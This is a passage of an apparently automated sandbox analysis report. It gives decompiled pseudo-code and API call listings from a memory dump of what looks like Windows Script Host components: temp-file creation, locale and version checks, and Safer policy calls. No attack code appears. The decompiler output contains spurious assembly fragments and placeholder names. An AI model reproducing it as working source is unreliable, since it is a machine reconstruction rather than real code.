                                                        				if(_t50 < 0) {
                                                        					goto L11;
                                                        				}
                                                        				_t52 =  *((intOrPtr*)( *_t59 + 0x24))(_t59, _v88, 0, E00B90538,  &_v84);
                                                        				_t71 = _t52;
                                                        				if(_t52 < 0) {
                                                        					goto L11;
                                                        				}
                                                        				_t53 = _v84;
                                                        				_t69 =  &_v80;
                                                        				_t54 =  *((intOrPtr*)( *_t53 + 0x30))(_t53,  &_v80, 1);
                                                        				_t71 = _t54;
                                                        				if(_t54 < 0) {
                                                        					goto L11;
                                                        				}
                                                        				if(_v68 != 0) {
                                                        					L6:
                                                        					_t71 = 0x8007000e;
                                                        					goto L11;
                                                        				}
                                                        				_t59 = _v72;
                                                        				__imp__#150(0, _t59);
                                                        				_v92 = _t54;
                                                        				if(_t54 != 0) {
                                                        					_t55 = _v84;
                                                        					_t68 =  *_t55;
                                                        					_t56 =  *((intOrPtr*)( *_t55 + 0xc))(_t55, _v92, _t59, 0);
                                                        					_t71 = _t56;
                                                        					__eflags = _t56;
                                                        					if(__eflags >= 0) {
                                                        						if(__eflags == 0) {
                                                        							_t71 = E00B857A1(_t68,  *((intOrPtr*)(_v100 + 0x18)), _v92, _t59, _v96);
                                                        						} else {
                                                        							_t71 = 0x80004005;
                                                        						}
                                                        					}
                                                        					goto L11;
                                                        				}
                                                        				goto L6;
                                                        			}

                                                        APIs
                                                        • CreateBindCtx.OLE32(00000000,?), ref: 00B9044F
                                                        • SysAllocStringByteLen.OLEAUT32(00000000,?), ref: 00B904BA
                                                          • Part of subcall function 00B857A1: IsTextUnicode.ADVAPI32(?,00000000,?), ref: 00B857E0
                                                          • Part of subcall function 00B857A1: MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00B904FD,?,?), ref: 00B85804
                                                          • Part of subcall function 00B857A1: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00B85817
                                                          • Part of subcall function 00B857A1: MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,00B904FD,?,?), ref: 00B8583B
                                                        • SysFreeString.OLEAUT32(?), ref: 00B90502
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteString$AllocCharMultiWide$BindCreateFreeTextUnicode
                                                        • String ID:
                                                        • API String ID: 2083688437-0
                                                        • Opcode ID: de631e3d476ef757412b9fbb4c837aa5c34ad4b3dbc26fb81f065d800dc4a037
                                                        • Instruction ID: d1c8180e5c21c5cd654789e0051a019385ae64e2b9200dae3388f7baa2e229a8
                                                        • Opcode Fuzzy Hash: de631e3d476ef757412b9fbb4c837aa5c34ad4b3dbc26fb81f065d800dc4a037
                                                        • Instruction Fuzzy Hash: 4941FB759002689FCB11EFE8C88889DFBF9EF98310B2545A9EA16EB314D7719C41CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 64%
                                                        			E00B8719A(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                        				void* _v8;
                                                        				intOrPtr* _t14;
                                                        				char* _t15;
                                                        				char* _t18;
                                                        				intOrPtr* _t19;
                                                        				intOrPtr* _t21;
                                                        				char* _t36;
                                                        				intOrPtr* _t39;
                                                        				intOrPtr* _t40;
                                                        				intOrPtr _t45;
                                                        
                                                        				_t14 = _a8;
                                                        				if(_t14 == 0) {
                                                        					_t15 = 0x80004003;
                                                        				} else {
                                                        					_t39 = _a4 + 0x3c;
                                                        					 *_t14 = 0;
                                                        					if( *_t39 != 0) {
                                                        						L9:
                                                        						 *_t14 =  *_t39;
                                                        						_t40 =  *_t39;
                                                        						 *((intOrPtr*)( *_t40 + 4))(_t40);
                                                        						_t15 = 0;
                                                        					} else {
                                                        						_t18 =  &_v8;
                                                        						_v8 = 0;
                                                        						__imp__CoCreateInstance(E00B873E0, 0, 1, E00B8749C, _t18);
                                                        						_t36 = _t18;
                                                        						if(_t36 < 0) {
                                                        							L13:
                                                        							_t15 = _t36;
                                                        						} else {
                                                        							_t45 =  *0xb97001; // 0x0
                                                        							if(_t45 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x40)) + 0x25)) == 0 && E00B819AE(GetStdHandle(0xfffffff4)) == 0) {
                                                        								_push(_t39);
                                                        								_push(0);
                                                        							} else {
                                                        								_push(_t39);
                                                        								_push(1);
                                                        							}
                                                        							_t19 = _v8;
                                                        							_t36 =  *((intOrPtr*)( *_t19 + 0x80))(_t19, 2);
                                                        							_t21 = _v8;
                                                        							 *((intOrPtr*)( *_t21 + 8))(_t21);
                                                        							if(_t36 < 0) {
                                                        								goto L13;
                                                        							} else {
                                                        								_t14 = _a8;
                                                        								goto L9;
                                                        							}
                                                        						}
                                                        					}
                                                        				}
                                                        				return _t15;
                                                        			}

                                                        APIs
                                                        • CoCreateInstance.OLE32(00B873E0,00000000,00000001,00B8749C,?), ref: 00B871D0
                                                        • GetStdHandle.KERNEL32(000000F4), ref: 00B871F1
                                                          • Part of subcall function 00B819AE: GetConsoleMode.KERNEL32 ref: 00B819BA
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ConsoleCreateHandleInstanceMode
                                                        • String ID:
                                                        • API String ID: 733827414-0
                                                        • Opcode ID: f0f9490c840ab5e014f2c43e381bad54fee904a936d68e0b8788c84279e6d634
                                                        • Instruction ID: 16a3944cfd3c432a028f5b80b170609c8da46b5d6ae7c989f462f8cef3c5df9b
                                                        • Opcode Fuzzy Hash: f0f9490c840ab5e014f2c43e381bad54fee904a936d68e0b8788c84279e6d634
                                                        • Instruction Fuzzy Hash: 9621A271688204AFC710EF98CCC4D5ABBE9EF5A358B2544A8F945DB271CA31DD41CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 75%
                                                        			E00B941BC() {
                                                        				signed int _v8;
                                                        				long _v72;
                                                        				void* __esi;
                                                        				signed int _t5;
                                                        				signed int _t12;
                                                        				intOrPtr _t13;
                                                        				intOrPtr _t16;
                                                        				intOrPtr _t17;
                                                        				intOrPtr _t18;
                                                        				signed int _t22;
                                                        
                                                        				_t5 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t5 ^ _t22;
                                                        				_t18 = 0xc04;
                                                        				if(GetLocaleInfoW(0x404, 8,  &_v72, 0x20) != 0) {
                                                        					_t12 = wcsncmp( &_v72, 0xb94220, 3);
                                                        					asm("sbb esi, esi");
                                                        					_t18 = ( ~_t12 & 0xfffff800) + 0xc04;
                                                        				}
                                                        				return E00B81335(_t18, _t13, _v8 ^ _t22, _t16, _t17, _t18);
                                                        			}














                                                        APIs
                                                        • GetLocaleInfoW.KERNEL32(00000404,00000008,?,00000020,00000008), ref: 00B941E1
                                                        • wcsncmp.MSVCRT(?,00B94220,00000003), ref: 00B941F6
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: InfoLocalewcsncmp
                                                        • String ID:
                                                        • API String ID: 4128031126-0
                                                        • Opcode ID: c852dd89c7ead89ffe768bf52a579fb8143f159f1c9d5451d36fa62a5f8c4984
                                                        • Instruction ID: 2e958128d77d9e50e815a0ecfab7d41261b7eed4892043549de0d8966b15c223
                                                        • Opcode Fuzzy Hash: c852dd89c7ead89ffe768bf52a579fb8143f159f1c9d5451d36fa62a5f8c4984
                                                        • Instruction Fuzzy Hash: 26F089B2E5025867EF10D7649D06F5E72ECE744714F050170BA41AB2D1DA60AE05C799
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 84%
                                                        			E00B8587A() {
                                                        				signed int _v8;
                                                        				struct _OSVERSIONINFOA _v156;
                                                        				signed int _t8;
                                                        				signed int _t12;
                                                        				intOrPtr _t15;
                                                        				intOrPtr _t18;
                                                        				intOrPtr _t19;
                                                        				intOrPtr _t20;
                                                        				signed int _t21;
                                                        
                                                        				_t8 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t8 ^ _t21;
                                                        				_v156.dwOSVersionInfoSize = 0x94;
                                                        				if(GetVersionExA( &_v156) == 0) {
                                                        					_t12 = 0;
                                                        				} else {
                                                        					_t12 = 0 | _v156.dwPlatformId == 0x00000002;
                                                        				}
                                                        				return E00B81335(_t12, _t15, _v8 ^ _t21, _t18, _t19, _t20);
                                                        			}













                                                        APIs
                                                        • GetVersionExA.KERNEL32(?), ref: 00B858A0
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Version
                                                        • String ID:
                                                        • API String ID: 1889659487-0
                                                        • Opcode ID: ef00fb002ccd571dc0a30296180c0bb6b98a63eded316966de56fd56173c989f
                                                        • Instruction ID: fd53f6e9edbdaf4fcca1b7fb9e374a8a1cc548cb4df56b4c041ab704254b34ee
                                                        • Opcode Fuzzy Hash: ef00fb002ccd571dc0a30296180c0bb6b98a63eded316966de56fd56173c989f
                                                        • Instruction Fuzzy Hash: F9E09A31600208ABCB60EF38DA4679EB7F8AB06300F9044E9900ED7292DE349A89DB04
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00B93F69(struct HINSTANCE__* _a4) {
                                                        				struct HRSRC__* _t3;
                                                        
                                                        				_t3 = E00B93F3E(_a4, 0);
                                                        				if(_t3 != 0) {
                                                        					return LoadResource(_a4, _t3);
                                                        				}
                                                        				return _t3;
                                                        			}





                                                        APIs
                                                          • Part of subcall function 00B93F3E: FindResourceExW.KERNEL32(?,MUI,00000001,00B948D9,?,00B948D9,?,00000000), ref: 00B93F50
                                                        • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00B93FA9,00000000,?,?,00B946FD,00000000,00000000,00000000,00000000,00000008,?), ref: 00B93F80
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Resource$FindLoad
                                                        • String ID:
                                                        • API String ID: 2619053042-0
                                                        • Opcode ID: bf1394402e26312faf6408a1059b4a4d7c3f127c2e5d4ac734edbfe77aa0f4c2
                                                        • Instruction ID: 015080d8abcdb66d36ae0bc050f8c994542b0fb69ea010bce36999b1a01378d7
                                                        • Opcode Fuzzy Hash: bf1394402e26312faf6408a1059b4a4d7c3f127c2e5d4ac734edbfe77aa0f4c2
                                                        • Instruction Fuzzy Hash: D8C0123140414877DF111F12DC05F963EEDDB50B90F004030BA0485060DB31DD51D554
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 92%
                                                        			E00B85AD1(signed int __eax, WCHAR* __ebx, signed int __ecx, WCHAR** __edi, intOrPtr _a4, intOrPtr* _a8) {
                                                        				WCHAR* _t24;
                                                        				WCHAR* _t28;
                                                        				signed int _t30;
                                                        				intOrPtr* _t34;
                                                        				WCHAR* _t36;
                                                        				WCHAR** _t42;
                                                        				signed int _t45;
                                                        				void* _t46;
                                                        
                                                        				_t42 = __edi;
                                                        				_t36 = __ebx;
                                                        				asm("insd");
                                                        				asm("a16 and al, 0x42");
                                                        				asm("ficom dword [edi]");
                                                        				if((__ecx & __eax) <= 0) {
                                                        					if(__eax + 0xb973f0 == 0) {
                                                        						L12:
                                                        						_t24 = 0;
                                                        					} else {
                                                        						do {
                                                        							_t45 = lstrlenW( *_t42);
                                                        							if(E00B82753( *_t42, _t36, _t45) == 0) {
                                                        								_t6 =  &(_t42[2]); // 0x0
                                                        								_t38 = 0;
                                                        								_t28 =  *_t6;
                                                        								if(_t28 != 0) {
                                                        									if(_t28 != 1) {
                                                        										goto L12;
                                                        									} else {
                                                        										_t30 =  *(_t36 + _t45 * 2) & 0x0000ffff;
                                                        										if(_t30 != 0x3a) {
                                                        											L18:
                                                        											if(_t30 == _t38) {
                                                        												goto L21;
                                                        											} else {
                                                        												_t42 =  &(_t42[3]);
                                                        												goto L5;
                                                        											}
                                                        										} else {
                                                        											if( *((intOrPtr*)(_t36 + 2 + _t45 * 2)) != 0) {
                                                        												_t19 = _t45 * 2; // 0x80000005
                                                        												 *_a8 = _t36 + _t19 + 2;
                                                        												goto L9;
                                                        											} else {
                                                        												if(_t30 == _t30) {
                                                        													L21:
                                                        													 *_a8 = _t38;
                                                        													goto L9;
                                                        												} else {
                                                        													goto L18;
                                                        												}
                                                        											}
                                                        										}
                                                        									}
                                                        									goto L23;
                                                        								} else {
                                                        									if( *(_t36 + _t45 * 2) != 0) {
                                                        										_t24 = 0x3a;
                                                        									} else {
                                                        										L9:
                                                        										_t9 =  &(_t42[1]); // 0x42
                                                        										_t24 =  *_t9;
                                                        									}
                                                        								}
                                                        							} else {
                                                        								_t42 =  &(_t42[3]);
                                                        								_t38 = 0;
                                                        								goto L5;
                                                        							}
                                                        							goto L10;
                                                        							L5:
                                                        						} while ( *_t42 != _t38);
                                                        						goto L12;
                                                        					}
                                                        					L10:
                                                        					return _t24;
                                                        				} else {
                                                        					_a4 = _a4 - 0xc;
                                                        					_t34 =  *((intOrPtr*)(_a4 + 0x10));
                                                        					return  *((intOrPtr*)( *_t34 + 4))(_t34, _t46);
                                                        				}
                                                        				L23:
                                                        			}












                                                        APIs
                                                        • lstrlenW.KERNEL32(00B973F0,80000001,?,?,00B859F3,00B83C8C,80000001,?,?), ref: 00B85A7A
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID:
                                                        • API String ID: 1659193697-0
                                                        • Opcode ID: 839cc73d04c8ffc001fb506cbafa697eba2f5b1db07b13f144f101dc999c5a40
                                                        • Instruction ID: 1a781a804536e800d13627f078bd2a9dfdf89fac2e8ed2a0f9bc9345372b59e4
                                                        • Opcode Fuzzy Hash: 839cc73d04c8ffc001fb506cbafa697eba2f5b1db07b13f144f101dc999c5a40
                                                        • Instruction Fuzzy Hash: 45E09B36645512DFDB387A24C4C8076B7E9EB553A17248AB2ECC196130DB31CC11D755
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 84%
                                                        			E00B90E17(int _a4, int _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                        				int _v8;
                                                        				int _v12;
                                                        				CHAR* _v16;
                                                        				void _v20;
                                                        				long _v24;
                                                        				long _v28;
                                                        				intOrPtr* _t61;
                                                        				long _t62;
                                                        				signed int _t63;
                                                        				CHAR* _t66;
                                                        				CHAR* _t67;
                                                        				void* _t69;
                                                        				signed int _t70;
                                                        				intOrPtr* _t74;
                                                        				int _t75;
                                                        				short* _t76;
                                                        				signed int _t79;
                                                        				intOrPtr* _t90;
                                                        				signed int _t94;
                                                        				char* _t96;
                                                        				intOrPtr _t104;
                                                        				intOrPtr* _t106;
                                                        				intOrPtr _t108;
                                                        				intOrPtr _t112;
                                                        				int _t113;
                                                        				signed int _t116;
                                                        				CHAR* _t118;
                                                        				void* _t119;
                                                        
                                                        				 *_a16 = 0;
                                                        				_t61 = _a20;
                                                        				_v12 = 0;
                                                        				_v8 = 0;
                                                        				_v20 = 0xfeff;
                                                        				if(_t61 != 0) {
                                                        					 *_t61 = 0;
                                                        				}
                                                        				if(_a4 == 0) {
                                                        					L7:
                                                        					_t62 = GetTempPathA(0, 0);
                                                        					if(_t62 == 0) {
                                                        						L4:
                                                        						_t63 = GetLastError();
                                                        						if(_t63 > 0) {
                                                        							_t63 = _t63 & 0x0000ffff | 0x80070000;
                                                        						}
                                                        						_t116 = _t63;
                                                        						L52:
                                                        						return _t116;
                                                        					}
                                                        					_t66 = _t62 + 1;
                                                        					_push(_t66);
                                                        					_v24 = _t66;
                                                        					L00B82877();
                                                        					_v16 = _t66;
                                                        					if(_t66 != 0) {
                                                        						_t67 = GetTempPathA(_v24, _t66);
                                                        						if(_t67 != 0) {
                                                        							_t14 = _v12 + 0xf; // 0xf
                                                        							_t118 =  &(_t67[_t14]);
                                                        							_push(_t118);
                                                        							L00B82877();
                                                        							_v12 = _t67;
                                                        							if(_t67 != 0) {
                                                        								if(GetTempFileNameA(_v16, ?str?, 0, _t67) != 0) {
                                                        									if(_a4 == 0) {
                                                        										L24:
                                                        										_t69 = CreateFileA(_v12, 0xc0000000, 0, 0, 2, 0x4002100, 0);
                                                        										_v8 = _t69;
                                                        										if(_t69 == 0xffffffff) {
                                                        											_v8 = 0;
                                                        										}
                                                        										if(_v8 == 0) {
                                                        											goto L17;
                                                        										} else {
                                                        											_t112 = _a12;
                                                        											if(_t112 <= 0) {
                                                        												L32:
                                                        												if(_a20 == 0) {
                                                        													L43:
                                                        													_a4 = 0;
                                                        													 *_a16 = _v8;
                                                        													_v8 = 0;
                                                        													_t116 = 0;
                                                        													L44:
                                                        													if(_a4 != 0) {
                                                        														__imp__#6(_a4);
                                                        													}
                                                        													L46:
                                                        													if(_v12 != 0) {
                                                        														_push(_v12);
                                                        														L00B82082();
                                                        													}
                                                        													L48:
                                                        													if(_v16 != 0) {
                                                        														_push(_v16);
                                                        														L00B82082();
                                                        													}
                                                        													if(_v8 != 0) {
                                                        														CloseHandle(_v8);
                                                        													}
                                                        													goto L52;
                                                        												}
                                                        												_t74 = _v12;
                                                        												_t119 = _t74 + 1;
                                                        												do {
                                                        													_t104 =  *_t74;
                                                        													_t74 = _t74 + 1;
                                                        												} while (_t104 != 0);
                                                        												_t75 = _t74 - _t119;
                                                        												_a8 = _t75;
                                                        												_t76 = MultiByteToWideChar(0, 0, _v12, _t75, 0, 0);
                                                        												_t113 = _t76;
                                                        												if(_t113 == 0) {
                                                        													goto L17;
                                                        												}
                                                        												__imp__#4(0, _t113);
                                                        												_a4 = _t76;
                                                        												if(_t76 != 0) {
                                                        													if(MultiByteToWideChar(0, 0, _v12, _a8, _t76, _t113) != 0) {
                                                        														 *_a20 = _a4;
                                                        														goto L43;
                                                        													}
                                                        													_t79 = GetLastError();
                                                        													if(_t79 > 0) {
                                                        														_t79 = _t79 & 0x0000ffff | 0x80070000;
                                                        													}
                                                        													_t116 = _t79;
                                                        													goto L44;
                                                        												}
                                                        												_t116 = 0x8007000e;
                                                        												goto L44;
                                                        											}
                                                        											if( *_a8 == _v20 || WriteFile(_v8,  &_v20, 2,  &_v28, 0) != 0) {
                                                        												if(WriteFile(_v8, _a8, _t112 + _t112,  &_v28, 0) == 0 || FlushFileBuffers(_v8) == 0) {
                                                        													goto L17;
                                                        												} else {
                                                        													goto L32;
                                                        												}
                                                        											} else {
                                                        												goto L17;
                                                        											}
                                                        										}
                                                        									}
                                                        									_t106 = _v12;
                                                        									_t90 = _t106;
                                                        									_v24 = _t90 + 1;
                                                        									do {
                                                        										_t108 =  *_t90;
                                                        										_t90 = _t90 + 1;
                                                        									} while (_t108 != 0);
                                                        									if(WideCharToMultiByte(0, 0, _a4, 0xffffffff, _t90 - _v24 + _t106, _t118 - _t90 - _v24, 0, 0) == 0) {
                                                        										goto L17;
                                                        									}
                                                        									goto L24;
                                                        								}
                                                        								L17:
                                                        								_t70 = GetLastError();
                                                        								if(_t70 > 0) {
                                                        									_t70 = _t70 & 0x0000ffff | 0x80070000;
                                                        								}
                                                        								_t116 = _t70;
                                                        								goto L46;
                                                        							}
                                                        							_t116 = 0x8007000e;
                                                        							goto L46;
                                                        						}
                                                        						_t94 = GetLastError();
                                                        						if(_t94 > 0) {
                                                        							_t94 = _t94 & 0x0000ffff | 0x80070000;
                                                        						}
                                                        						_t116 = _t94;
                                                        						goto L48;
                                                        					}
                                                        					_t116 = 0x8007000e;
                                                        					goto L48;
                                                        				}
                                                        				_t96 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, 0, 0, 0, 0);
                                                        				_v12 = _t96;
                                                        				if(_t96 != 0) {
                                                        					goto L7;
                                                        				}
                                                        				goto L4;
                                                        			}

                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,74EC1222,00000000,00000000,0000008C), ref: 00B90E55
                                                        • GetLastError.KERNEL32 ref: 00B90E5E
                                                        • GetTempPathA.KERNEL32(00000000,00000000), ref: 00B90E83
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B90E8E
                                                        • GetTempPathA.KERNEL32(00000000,00000000), ref: 00B90EA9
                                                        • GetLastError.KERNEL32 ref: 00B90EAF
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B90ED4
                                                        • GetTempFileNameA.KERNEL32(00000000,wsh,00000000,00000000), ref: 00B90EF5
                                                        • GetLastError.KERNEL32 ref: 00B90EFF
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000000F,00000000,00000000), ref: 00B90F45
                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,04002100,00000000), ref: 00B90F5D
                                                        • WriteFile.KERNEL32(00000000,0000FEFF,00000002,?,00000000), ref: 00B90F9A
                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00B90FB3
                                                        • FlushFileBuffers.KERNEL32(00000000), ref: 00B90FC0
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00B90FF3
                                                        • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00B91001
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00B9101F
                                                        • GetLastError.KERNEL32 ref: 00B91025
                                                        • SysFreeString.OLEAUT32(?), ref: 00B9105D
                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00B9106B
                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00B91079
                                                        • CloseHandle.KERNEL32(00000000), ref: 00B91087
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: File$ByteCharErrorLastMultiWide$Temp$??2@??3@PathStringWrite$AllocBuffersCloseCreateFlushFreeHandleName
                                                        • String ID: wsh
                                                        • API String ID: 2168408934-3917767832
                                                        • Opcode ID: 91be9554f405e9c033288097ec880d428276379a4bdd9ffc410c5a81466ab5f0
                                                        • Instruction ID: 05c791a5780b84950f4b62b2e89b061febde44d23b1b26d3e31baf4d2a6b1b8c
                                                        • Opcode Fuzzy Hash: 91be9554f405e9c033288097ec880d428276379a4bdd9ffc410c5a81466ab5f0
                                                        • Instruction Fuzzy Hash: 79813C7291015AEFDF20AFA8CCC49AE7BF9EF04354B2449B9F501E7160D6358E85DBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 47%
                                                        			E00B84BA1(void* __ecx, void* __edi, signed int _a4) {
                                                        				signed int _v8;
                                                        				intOrPtr _v12;
                                                        				int _v16;
                                                        				int _v20;
                                                        				int _v24;
                                                        				int _v28;
                                                        				int _v32;
                                                        				int _v36;
                                                        				void _v100;
                                                        				int _v104;
                                                        				intOrPtr _v108;
                                                        				intOrPtr _v112;
                                                        				intOrPtr _v116;
                                                        				void _v120;
                                                        				signed int _v124;
                                                        				int _v128;
                                                        				int _v132;
                                                        				char _v136;
                                                        				char _v140;
                                                        				intOrPtr _v144;
                                                        				int _v148;
                                                        				char _v152;
                                                        				_Unknown_base(*)()* _v156;
                                                        				_Unknown_base(*)()* _v160;
                                                        				void* __ebx;
                                                        				void* __esi;
                                                        				signed int _t76;
                                                        				signed int _t81;
                                                        				_Unknown_base(*)()* _t88;
                                                        				_Unknown_base(*)()* _t89;
                                                        				_Unknown_base(*)()* _t90;
                                                        				signed int _t94;
                                                        				signed int _t105;
                                                        				signed int _t109;
                                                        				_Unknown_base(*)()* _t110;
                                                        				void* _t122;
                                                        				void* _t125;
                                                        				signed int _t126;
                                                        
                                                        				_t123 = __edi;
                                                        				_t76 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t76 ^ _t126;
                                                        				_t125 = __ecx;
                                                        				_v124 = _a4;
                                                        				_v128 = 0;
                                                        				_v132 = 0;
                                                        				_v136 = 0;
                                                        				_v152 = 0;
                                                        				_v140 = 0;
                                                        				_v144 =  *((intOrPtr*)(__ecx + 0x238));
                                                        				_v148 = 0;
                                                        				if( *((intOrPtr*)(__ecx + 0x26)) == 0) {
                                                        					_t81 = 1;
                                                        					L21:
                                                        					return E00B81335(_t81, 0, _v8 ^ _t126, _t122, _t123, _t125);
                                                        				}
                                                        				if(E00B855CA(__ecx, "advapi32.dll",  &_v128) < 0) {
                                                        					_v124 = 1;
                                                        					L14:
                                                        					if(_v132 != 0) {
                                                        						CloseHandle(_v132);
                                                        					}
                                                        					if(_v136 != 0 && _v148 != 0) {
                                                        						_v148(_v136);
                                                        					}
                                                        					if(_v128 != 0) {
                                                        						FreeLibrary(_v128);
                                                        					}
                                                        					_t81 = _v124;
                                                        					goto L21;
                                                        				}
                                                        				_push(__edi);
                                                        				_t88 = GetProcAddress(_v128, "SaferIdentifyLevel");
                                                        				_v156 = _t88;
                                                        				if(_t88 == 0) {
                                                        					L26:
                                                        					_v124 = 1;
                                                        					L13:
                                                        					_pop(_t123);
                                                        					goto L14;
                                                        				}
                                                        				_t89 = GetProcAddress(_v128, "SaferComputeTokenFromLevel");
                                                        				_v160 = _t89;
                                                        				if(_t89 == 0) {
                                                        					goto L26;
                                                        				}
                                                        				_t90 = GetProcAddress(_v128, "SaferCloseLevel");
                                                        				_v148 = _t90;
                                                        				if(_t90 == 0) {
                                                        					goto L26;
                                                        				}
                                                        				if( *((intOrPtr*)(_t125 + 0x27)) != 0) {
                                                        					_t92 =  &_v152;
                                                        					__imp__#7( &_v140);
                                                        					_t94 = E00B90E17(wcsrchr( *(_t125 + 0x238), 0x2e), _v124,  &_v152, _v124, _t92);
                                                        					_v124 = _t94;
                                                        					if(_t94 < 0) {
                                                        						L12:
                                                        						if(_v140 != 0) {
                                                        							__imp__#6(_v140);
                                                        						}
                                                        						goto L13;
                                                        					}
                                                        					_v144 = _v140;
                                                        				}
                                                        				memset( &_v120, 0, 0x70);
                                                        				_v112 = _v144;
                                                        				_v108 = _v152;
                                                        				_v120 = 0x70;
                                                        				_v116 = 0xd;
                                                        				_v104 = 0;
                                                        				memset( &_v100, 0, 0x40);
                                                        				_v36 = 0;
                                                        				_v32 = 0;
                                                        				_v28 = 0;
                                                        				_v24 = 0;
                                                        				_v20 = 0;
                                                        				_v16 = 0;
                                                        				if( *((intOrPtr*)(_t125 + 0x28)) == 1) {
                                                        					_v12 = 1;
                                                        					if( *((intOrPtr*)(_t125 + 0x20)) == 0) {
                                                        						L8:
                                                        						_push(L"SCRIPT");
                                                        						_push( &_v136);
                                                        						_push( &_v120);
                                                        						_push(1);
                                                        						if(_v156() == 0) {
                                                        							L29:
                                                        							_t105 = GetLastError();
                                                        							if(_t105 > 0) {
                                                        								_t105 = _t105 & 0x0000ffff | 0x80070000;
                                                        							}
                                                        							_v124 = _t105;
                                                        							goto L12;
                                                        						}
                                                        						_push(0);
                                                        						_push(1);
                                                        						_push( &_v132);
                                                        						_push(0);
                                                        						_push(_v136);
                                                        						if(_v160() == 0) {
                                                        							_t109 = GetLastError();
                                                        							if(_t109 > 0) {
                                                        								_t109 = _t109 & 0x0000ffff | 0x80070000;
                                                        							}
                                                        							_v124 = _t109;
                                                        							_t110 = GetProcAddress(_v128, "SaferRecordEventLogEntry");
                                                        							if(_t110 != 0) {
                                                        								 *_t110(_v136, _v144, 0);
                                                        							}
                                                        							goto L12;
                                                        						}
                                                        						if(_v132 != 0) {
                                                        							if(ImpersonateLoggedOnUser(_v132) != 0) {
                                                        								goto L11;
                                                        							}
                                                        							goto L29;
                                                        						}
                                                        						L11:
                                                        						_v124 = 0;
                                                        						goto L12;
                                                        					} else {
                                                        						goto L7;
                                                        					}
                                                        				}
                                                        				L7:
                                                        				_v12 = 2;
                                                        				goto L8;
                                                        			}

                                                        APIs
                                                          • Part of subcall function 00B855CA: GetSystemDirectoryA.KERNEL32(?,00000000), ref: 00B855DD
                                                          • Part of subcall function 00B855CA: ??2@YAPAXI@Z.MSVCRT ref: 00B85603
                                                          • Part of subcall function 00B855CA: GetSystemDirectoryA.KERNEL32(00000000,00000001), ref: 00B85616
                                                          • Part of subcall function 00B855CA: LoadLibraryA.KERNEL32(00000000), ref: 00B85645
                                                          • Part of subcall function 00B855CA: ??3@YAXPAX@Z.MSVCRT ref: 00B8565F
                                                        • GetProcAddress.KERNEL32(?,SaferIdentifyLevel,00000000,advapi32.dll,?,?,?), ref: 00B84C1A
                                                        • GetProcAddress.KERNEL32(?,SaferComputeTokenFromLevel,?,?), ref: 00B84C32
                                                        • GetProcAddress.KERNEL32(?,SaferCloseLevel,?,?), ref: 00B84C4A
                                                        • memset.MSVCRT ref: 00B84C6A
                                                        • memset.MSVCRT ref: 00B84C99
                                                        • FreeLibrary.KERNEL32(?,?,00000000,?,?), ref: 00B84D47
                                                        • SysStringLen.OLEAUT32(?), ref: 00B88DBC
                                                        • wcsrchr.MSVCRT ref: 00B88DCE
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00B88DF7
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00B88E13
                                                        • GetProcAddress.KERNEL32(?,SaferRecordEventLogEntry,?,?,?,?,?,?), ref: 00B88E32
                                                        Strings
                                                        Memory Dump Source
